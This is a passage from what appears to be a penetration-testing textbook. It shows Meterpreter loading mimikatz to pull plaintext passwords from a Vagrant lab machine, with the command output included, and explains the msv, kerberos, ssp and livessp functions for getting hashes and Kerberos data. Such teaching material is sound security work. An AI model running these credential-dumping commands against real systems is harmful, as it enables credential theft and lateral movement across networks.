run the different functions.
Example 6-11
shows the use of
mimikatz_command
to
search for passwords.
Example 6-11. Using mimikatz to get passwords
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[
0
]
{
sshd_server ; VAGRANT-2008R2 ; D@rj33l1ng
}
[
1
]
{
Administrator ; VAGRANT-2008R2 ; vagrant
}
[
2
]
{
VAGRANT-2008R2 ; sshd_server ; D@rj33l1ng
}
[
3
]
{
Administrator ; VAGRANT-2008R2 ; vagrant
}
[
4
]
{
VAGRANT-2008R2 ; Administrator ; vagrant
}
[
5
]
{
sshd_server ; VAGRANT-2008R2 ; D@rj33l1ng
}
The output shows passwords associated with users on the system. Beyond searching
for passwords, we can use
msv
to get password hashes. Since Windows uses Kerberos
to do system-to-system authentication, it’s useful to be able to extract Kerberos
authentication after we have compromised a system. Getting Kerberos information
may allow us to migrate from our current compromised system to another system on
the network. The
mimikatz
module will pull the Kerberos information by running
kerberos
. Neither
msv
nor
kerberos
requires you to run
mimikatz_command
. You need
to load
mimikatz
and then run those functions directly. Similarly, you don’t need to
use
mimikatz_command
to use
ssp
and
livessp
. This will pull information from the
security service provider under Windows.
The
mimikatz
module is written by someone who is French. As a
result, all of the help that you can get from the module is also writ‐
ten in French. The commands you use to make
mimikatz
work are
in English, but if you need additional details such as the parame‐
ters, you need to either be able to read French or find a way to
translate them reliably.
